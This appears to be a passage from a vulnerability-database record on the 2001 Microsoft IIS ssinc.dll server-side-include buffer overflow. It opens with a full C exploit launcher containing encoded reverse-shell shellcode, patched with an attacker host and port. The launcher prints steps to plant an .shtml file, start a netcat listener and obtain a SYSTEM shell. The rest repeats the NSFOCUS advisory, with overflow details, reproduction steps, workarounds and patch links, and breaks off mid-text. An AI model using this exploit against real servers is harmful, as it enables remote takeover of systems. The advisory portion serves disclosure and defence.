to:\r\n\r\n\tMorphsta, Br00t, Macavity, Jacob &\r\nMonkfish...Not forgetting D-Niderlunds\r\n*/\r\n\r\n#include <stdio.h>\r\n/* #include <windows.h> uncomment if compiling on\r\nWin32 */\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\r\nunsigned char shellcode[] =\r\n\r\n\"\\x3C\\x21\\x2D\\x2D\\x23\\x69\\x6E\\x63\\x6C\\x75\\x64\\x65\\x20\\x66\\x69\\x6C\"\r\n\"\\x65\\x3D\\x22\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\xeb\\x03\\x5d\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc5\\x15\\x90\\x90\\x90\"\r\n\"\\x8b\\xc5\\x33\\xc9\\x66\\xb9\\xd7\\x02\\x50\\x80\\x30\\x95\\x40\\xe2\\xfa\\x2d\\x95\\x95\"\r\n\"\\x64\\xe2\\x14\\xad\\xd8\\xcf\\x05\\x95\\xe1\\x96\\xdd\\x7e\\x60\\x7d\\x95\\x95\\x95\\x95\"\r\n\"\\xc8\\x1e\\x40\\x14\\x7f\\x9a\\x6b\\x6a\\x6a\\x1e\\x4d\\x1e\\xe6\\xa9\\x96\\x66\\x1e\\xe3\"\r\n\"\\xed\\x96\\x66\\x1e\\xeb\\xb5\\x96\\x6e\\x1e\\xdb\\x81\\xa6\\x78\\xc3\\xc2\\xc4\\x1e\\xaa\"\r\n\"\\x96\\x6e\\x1e\\x67\\x2c\\x9b\\x95\\x95\\x95\\x66\\x33\\xe1\\x9d\\xcc\\xca\\x16\\x52\\x91\"\r\n\"\\xd0\\x77\\x72\\xcc\\xca\\xcb\\x1e\\x58\\x1e\\xd3\\xb1\\x96\\x56\\x44\\x74\\x96\\x54\\xa6\"\r\n\"\\x5c\\xf3\\x1e\\x9d\\x1e\\xd3\\x89\\x96\\x56\\x54\\x74\\x97\\x96\\x54\\x1e\\x95\\x96\\x56\"\r\n\"\\x1e\\x67\\x1e\\x6b\\x1e\\x45\\x2c\\x9e\\x95\\x95\\x95\\x7d\\xe1\\x94\\x95\\x95\\xa6\\x55\"\r\n\"\\x39\\x10\\x55\\xe0\\x6c\\xc7\\xc3\\x6a\\xc2\\x41\\xcf\\x1e\\x4d\\x2c\\x93\\x95\\x95\\x95\"\r\n\"\\x7d\\xce\\x94\\x95\\x95\\x52\\xd2\\xf1\\x99\\x95\\x95\\x95\\x52\\xd2\\xfd\\x95\\x95\\x95\"\r\n\"\\x95\\x52\\xd2\\xf9\\x94\\x95\\x95\\x95\\xff\\x95\\x18\\xd2\\xf1\\xc5\\x18\\xd2\\x85\\xc5\"\r\n\"\\x18\\xd2\\x81\\xc5\\x6a\\xc2\\x55\\xff\\x95\\x18\\xd2\\xf1\\xc5\\x18\\xd2\\x8d\\xc5\\x18\"\r\n\"\\xd2\\x89\\xc5\\x6a\\xc2\\x55\\x52\\xd2\\xb5\\xd1\\x95\\x95\\x95\\x18\\xd2\\xb5\\xc5\\x6a\"\r\n\"\\xc2\\x51\\x1e\\xd2\\x85\\x1c\\xd2\\xc9\\x1c\\xd2\\xf5\\x1e\\xd2\\x89\\x1c\\xd2\\xcd\\x14\"\r\n\"\\xda\\xd9\\x94\\x94\\x95\\x95\\xf3\\x52\\xd2\\xc5\\x95\\x95\\x18\\xd2\\xe5\\xc5\\x18\\xd2\"\r\n\"\\xb5\\xc5\\xa6\\x55\\xc5\\xc5\\xc5\\xff\\x94\\xc5\\xc5\\x7d\\x95\\x95\\x95\\x95\\xc8\\x14\"\r\n\"\\x78\\xd5\\x6b\\x6a\\x6a\\xc0\\xc5\\x6a\\xc2\\x5d\\x6a\\xe2\\x85\\x6a\\xc2\\x71\\x6a\\xe2\"\r\n\"\\x89\\x6a\\xc2\\x71\\xfd\\x95\\x91\\x95\\x95\\xff\\xd5\\x6a\\xc2\\x45\\x1e\\x7d\\xc5\\xfd\"\r\n\"\\x94\\x94\\x95\\x95\\x6a\\xc2\\x7d\\x10\\x55\\x9a\\x10\\x3e\\x95\\x95\\x95\\xa6\\x55\\xc5\"\r\n\"\\xd5\\xc5\\xd5\\xc5\\x6a\\xc2\\x79\\x16\\x6d\\x6a\\x9a\\x11\\x02\\x95\\x95\\x95\\x1e\\x4d\"\r\n\"\\xf3\\x52\\x92\\x97\\x95\\xf3\\x52\\xd2\\x97\\x8e\\xac\\x52\\xd2\\x91\\x55\\x3d\\x97\\x94\"\r\n\"\\xff\\x85\\x18\\x92\\xc5\\xc6\\x6a\\xc2\\x61\\xff\\xa7\\x6a\\xc2\\x49\\xa6\\x5c\\xc4\\xc3\"\r\n\"\\xc4\\xc4\\xc4\\x6a\\xe2\\x81\\x6a\\xc2\\x59\\x10\\x55\\xe1\\xf5\\x05\\x05\\x05\\x05\\x15\"\r\n\"\\xab\\x95\\xe1\\xba\\x05\\x05\\x05\\x05\\xff\\x95\\xc3\\xfd\\x95\\x91\\x95\\x95\\xc0\\x6a\"\r\n\"\\xe2\\x81\\x6a\\xc2\\x4d\\x10\\x55\\xe1\\xd5\\x05\\x05\\x05\\x05\\xff\\x95\\x6a\\xa3\\xc0\"\r\n\"\\xc6\\x6a\\xc2\\x6d\\x16\\x6d\\x6a\\xe1\\xbb\\x05\\x05\\x05\\x05\\x7e\\x27\\xff\\x95\\xfd\"\r\n\"\\x95\\x91\\x95\\x95\\xc0\\xc6\\x6a\\xc2\\x69\\x10\\x55\\xe9\\x8d\\x05\\x05\\x05\\x05\\xe1\"\r\n\"\\x09\\xff\\x95\\xc3\\xc5\\xc0\\x6a\\xe2\\x8d\\x6a\\xc2\\x41\\xff\\xa7\\x6a\\xc2\\x49\\x7e\"\r\n\"\\x1f\\xc6\\x6a\\xc2\\x65\\xff\\x95\\x6a\\xc2\\x75\\xa6\\x55\\x39\\x10\\x55\\xe0\\x6c\\xc4\"\r\n\"\\xc7\\xc3\\xc6\\x6a\\x47\\xcf\\xcc\\x3e\\x77\\x7b\\x56\\xd2\\xf0\\xe1\\xc5\\xe7\\xfa\\xf6\"\r\n\"\\xd4\\xf1\\xf1\\xe7\\xf0\\xe6\\xe6\\x95\\xd9\\xfa\\xf4\\xf1\\xd9\\xfc\\xf7\\xe7\\xf4\\xe7\"\r\n\"\\xec\\xd4\\x95\\xd6\\xe7\\xf0\\xf4\\xe1\\xf0\\xc5\\xfc\\xe5\\xf0\\x95\\xd2\\xf0\\xe1\\xc6\"\r\n\"\\xe1\\xf4\\xe7\\xe1\\xe0\\xe5\\xdc\\xfb\\xf3\\xfa\\xd4\\x95\\xd6\\xe7\\xf0\\xf4\\xe1\\xf0\"\r\n\"\\xc5\\xe7\\xfa\\xf6\\xf0\\xe6\\xe6\\xd4\\x95\\xc5\\xf0\\xf0\\xfe\\xdb\\xf4\\xf8\\xf0\\xf1\"\r\n\"\\xc5\\xfc\\xe5\\xf0\\x95\\xd2\\xf9\\xfa\\xf7\\xf4\\xf9\\xd4\\xf9\\xf9\\xfa\\xf6\\x95\\xc2\"\r\n\"\\xe7\\xfc\\xe1\\xf0\\xd3\\xfc\\xf9\\xf0\\x95\\xc7\\xf0\\xf4\\xf1\\xd3\\xfc\\xf9\\xf0\\x95\"\r\n\"\\xc6\\xf9\\xf0\\xf0\\xe5\\x95\\xd0\\xed\\xfc\\xe1\\xc5\\xe7\\xfa\\xf6\\xf0\\xe6\\xe6\\x95\"\r\n\"\\xd6\\xf9\\xfa\\xe6\\xf0\\xdd\\xf4\\xfb\\xf1\\xf9\\xf0\\x95\\xc2\\xc6\\xda\\xd6\\xde\\xa6\"\r\n\"\\xa7\\x95\\xc2\\xc6\\xd4\\xc6\\xe1\\xf4\\xe7\\xe1\\xe0\\xe5\\x95\\xe6\\xfa\\xf6\\xfe\\xf0\"\r\n\"\\xe1\\x95\\xf6\\xf9\\xfa\\xe6\\xf0\\xe6\\xfa\\xf6\\xfe\\xf0\\xe1\\x95\\xf6\\xfa\\xfb\\xfb\"\r\n\"\\xf0\\xf6\\xe1\\x95\\xe6\\xf0\\xfb\\xf1\\x95\\xe7\\xf0\\xf6\\xe3\\x95\\xf6\\xf8\\xf1\\xbb\"\r\n\"\\xf0\\xed\\xf0\\x95\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x33\"\r\n\"\\xc0\\xb0\\x90\\x03\\xd8\\x8b\\x03\\x8b\\x40\\x60\\x33\\xdb\\xb3\\x24\\x03\\xc3\\xff\\xe0\"\r\n\"\\xeb\\xb9\\x90\\x90\\x05\\x31\\x8c\\x6a\"\r\n\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x66\\x81\\xEC\\xD0\\x0E\\xE9\"\r\n\"\\xD2\\xF7\\xFF\\xFF\"\r\n\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\r\n\"\\x8B\\x94\\xF8\\x77\\x10\\xF3\\xC7\\xF3\\xC7\\x22\\x2D\\x2D\\x3E\\x0D\\x0A\\x00\";\r\n\r\nFILE *fp;\r\nunsigned short int a_port;\r\nunsigned long a_host;\r\n\r\nprintf (\"\\njim - IIS Server Side Include overflow launcher\\nby Indigo <indig0@talk21.com> 2001\\n\\n\");\r\n\r\nprintf (\"To exploit this vulnerability you must have write access\\n\");\r\nprintf (\"to the web root of the target web server.\\n\\n\");\r\nprintf (\"This program will generate a file called ssi.shtml.\\n\");\r\nprintf (\"Create a directory in the web root whose name is\\n\");\r\nprintf (\"12 characters long eg. ssi_overflow then put this file\\n\");\r\nprintf (\"into the new directory. Start up a netcat listener:\\n\\n\");\r\nprintf (\"nc -l -p <attacker port> -vv\\n\\n\");\r\nprintf (\"Access the file http://target/ssi_overflow/ssi.shtml\\n\");\r\nprintf (\"using a web browser. A SYSTEM shell will appear.\\n\\n\");\r\nprintf (\"N.B. I have had problems using Netscape to do this but IE works fine.\\n\\n\");\r\n\r\nif (argc != 3)\r\n{\r\n\tprintf (\"Usage: %s <attacker host> <attacker port>\\n\", argv[0]);\r\n\treturn (1);\r\n}\r\n\r\na_port = htons(atoi(argv[2]));\r\na_port^= 0x9595;\r\n\r\na_host = inet_addr(argv[1]);\r\na_host^=0x95959595;\r\n\r\nshellcode[417]= (a_port) & 0xff;\r\nshellcode[418]= (a_port >> 8) & 0xff;\r\n\r\nshellcode[422]= (a_host) & 0xff;\r\nshellcode[423]= (a_host >> 8) & 0xff;\r\nshellcode[424]= (a_host >> 16) & 0xff;\r\nshellcode[425]= (a_host >> 24) & 0xff;\r\n\r\nfp = fopen (\"./ssi.shtml\",\"wb\");\r\n\r\nfputs (shellcode,fp);\r\n\r\nfclose (fp);\r\n\r\nreturn 0;\r\n\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21071/"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:41", "bulletinFamily": "exploit", "description": "", "modified": "2001-08-19T00:00:00", "published": "2001-08-19T00:00:00", "href": "https://packetstormsecurity.com/files/25189/sa2001_06.txt.html", "id": "PACKETSTORM:25189", "type": "packetstorm", "title": "sa2001_06.txt", "sourceData": "`NSFOCUS Security Advisory(SA2001-06) \n \nTopic: Microsoft IIS ssinc.dll Buffer Overflow Vulnerability \n \nRelease Date\u00a3\u00ba 2001-08-17 \n \nCVE CAN ID : CAN-2001-0506 \nBUGTRAQ ID : 3190 \n \nAffected system: \n================ \n \n- Microsoft IIS 4.0 \n- Microsoft IIS 5.0 \n \nImpact: \n========= \n \nNSFOCUS Security Team has found a buffer overflow vulnerability in a dynamic \nlink library (ssinc.dll) of Microsoft IIS 4.0/5.0 when processing server side \ninclude files. Exploitation of it, an attacker could obtain SYSTEM privilege. \n \nDescription\u00a3\u00ba \n============ \n \nMicrosoft IIS supports SSI (Server Side Include) function. IIS use ssinc.dll as \na SSI interpreter. By default setting, extensions like .stm, .shtm and .shtml \nwould be mapped to interpreter process (Ssinc.dll). \n \nSSI supports \"#include\" directive, mostly in this form: \n \n \n \nWhen processing \"#include\" directive, ssinc.dll would check for the name of \nthe directory under which the .shtml file resides, append it before the \ninclude file and form a new path string. \n \nFor example: \n \nCreate a file named \"test.shtml\" with the following content and save it under \n\"wwwroot/abcd/\": \n \n \n \nThe new path string would be \"/abcd/ABCD\". Ssinc.dll would copy it to a \nbuffer of 0x804(2052) bytes. \n \nWhen obtaining Server-side include filename from test.shtml, ssinc.dll would \nperform length check for it. In case that it is longer than 0x801 bytes, \nssinc.dll would cut it to 0x801 bytes and append '\\0' at the end. Thus, the \ninclude filename (including the trailing '\\0') won't be longer than 0x802(2550) \nbytes. \n \nBut it does not check the length of the new path string appending current \ndirectory name. Thus, if we set the contained filename to be a string \nlonger than 0x801 bytes and save \"test.shtml\" under a directory (name of which \nis longer than 9 bytes), a buffer overflow would occur and overwrite the EBP \nand EIP saved in stack completely (The trailing '\\0' would overwrite the first \nargument). \n \nAs ssinc.dll is running in LOCAL SYSTEM context, in case that an attacker \ncarefully form the overflow data, he might change the procedure flow and run \narbitrary code with SYSTEM privilege. \n \nTo launch an attack, the attacker would need the following two conditions: \n \n1. Privilege to create file or directory under Web directory. \n2. Ability to access created file through Web service. \n \n \nExploit: \n========== \n \n1. Create a file \"test.shtml\" with following file content: \n \n \n \nNumber of 'A' should be over 2049. \n \n2. Create a directory \"a\" under Web directory. \nCopy \"test.shtml\" to \"a\" directory. \n \n3. Request \"test.shtml\" through web browser: \nhttp://webhost/a/test.shtml \n \n4. IIS would return a blank page which indicates that an overflow has occurred. \nMeanwhile the trailing '\\0' has overwritten the last byte of saved EBP. \n \nOn the contrary, in case that the contained file has a shorter name like \n'AA', IIS would return a SSI file '/a/AA' error message when receiving \nthe request. \n \n \n \nWorkaround: \n=================== \n \n1. Disable the write access to Web directory of untrusted user. \n2. Remove .shtml, .shtm and .stm mappings if SSI service is not needed. \n \nVendor Status: \n============== \n \n2001.6.11 We informed Microsoft of this vulnerability. \n2001.6.11 Microsoft replied that the bug has been reproduced. \n2001.8.15 Microsoft has released one security bulletin(MS01-044) concerning \nthis flaw. \n \nThe bulletin is live at : \n \nhttp://www.microsoft.com/technet/security/bulletin/MS01-044.asp \n \nPatches are available at: \n \n. Microsoft IIS 4.0: \nhttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=32061 \n \n. Microsoft IIS 5.0: \nhttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=32011 \n \nAdditional Information: \n======================== \n \nThe Common Vulnerabilities and Exposures (CVE) project has \nassigned the name CAN-2001-0506 to this issue. This is a \ncandidate for inclusion in the CVE list (http://cve.mitre.org), \nwhich standardizes names for security problems. Candidates \nmay change significantly before they become official CVE entries. \n \nDISCLAIMS: \n========== \nTHE INFORMATION PROVIDED IS RELEASED BY NSFOCUS \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, \nEXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS \nBE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, \nINCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, \nEVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. \nDISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE \nADVISORY IS NOT MODIFIED IN ANY WAY. \n \nCopyright 1999-2001 NSFOCUS. All Rights Reserved. Terms of use. \n \n \nNSFOCUS Security Team <security@nsfocus.com> \nNSFOCUS INFORMATION TECHNOLOGY CO.,LTD \n(http://www.nsfocus.com) \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/25189/sa2001_06.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:04", "bulletinFamily": "software", "description": "\r\nNSFOCUS Security Advisory(SA2001-06)\r\n\r\nTopic: Microsoft IIS ssinc.dll Buffer Overflow Vulnerability\r\n\r\nRelease Date\u0408\u0454 2001-08-17\r\n\r\nCVE CAN ID : CAN-2001-0506\r\nBUGTRAQ ID : 3190\r\n\r\nAffected system:\r\n================\r\n\r\n - Microsoft IIS 4.0 \r\n - Microsoft IIS 5.0 \r\n\r\nImpact: \r\n=========\r\n\r\nNSFOCUS Security Team has found a buffer overflow vulnerability in a dynamic \r\nlink library (ssinc.dll) of Microsoft IIS 4.0/5.0 when processing server side\r\ninclude files. Exploitation of it, an attacker could obtain SYSTEM privilege.\r\n\r\nDescription\u0408\u0454\r\n============\r\n\r\nMicrosoft IIS supports SSI (Server Side Include) function. IIS use ssinc.dll as \r\na SSI interpreter. By default setting, extensions like .stm, .shtm and .shtml \r\nwould be mapped to interpreter process (Ssinc.dll).\r\n\r\nSSI supports "#include" directive, mostly in this form:\r\n\r\n\r\n\r\nWhen processing "#include" directive, ssinc.dll would check for the name of \r\nthe directory under which the .shtml file resides, append it before the \r\ninclude file and form a new path string.\r\n\r\nFor example:\r\n\r\nCreate a file named "test.shtml" with the following content and save it under \r\n"wwwroot/abcd/":\r\n\r\n\r\n\r\nThe new path string would be "/abcd/ABCD". Ssinc.dll would copy it to a \r\nbuffer of 0x804(2052) bytes. \r\n\r\nWhen obtaining Server-side include filename from test.shtml, ssinc.dll would \r\nperform length check for it. In case that it is longer than 0x801 bytes, \r\nssinc.dll would cut it to 0x801 bytes and append '\0' at the end. Thus, the \r\ninclude filename (including the trailing '\0') won't be longer than 0x802(2550)\r\nbytes.\r\n\r\nBut it does not check the length of the new path string appending current\r\ndirectory name. Thus, if we set the contained filename to be a string\r\nlonger than 0x801 bytes and save "test.shtml" under a directory (name of which\r\nis longer than 9 bytes), a buffer overflow would occur and overwrite the EBP \r\nand EIP saved in stack completely (The trailing '\0' would overwrite the first \r\nargument).\r\n\r\nAs ssinc.dll is running in LOCAL SYSTEM context, in case that an attacker \r\ncarefully form the overflow data, he might change the procedure flow and run\r\narbitrary code with SYSTEM privilege.\r\n\r\nTo launch an attack, the attacker would need the following two conditions:\r\n\r\n1. Privilege to create file or directory under Web directory.\r\n2. Ability to access created file through Web service.\r\n\r\n\r\nExploit:\r\n==========\r\n\r\n1. Create a file "test.shtml" with following file content:\r\n\r\n \r\n\r\n Number of 'A' should be over 2049.\r\n\r\n2. Create a directory "a" under Web directory.\r\n Copy "test.shtml" to "a" directory.\r\n \r\n3. Request "test.shtml" through web browser:\r\n http://webhost/a/test.shtml\r\n\r\n4. IIS would return a blank page which indicates that an overflow has occurred.\r\n Meanwhile the trailing '\0' has overwritten the last byte of saved EBP.\r\n \r\n On the contrary, in case that the contained file has a shorter name like \r\n 'AA', IIS would return a SSI file '/a/AA' error message when 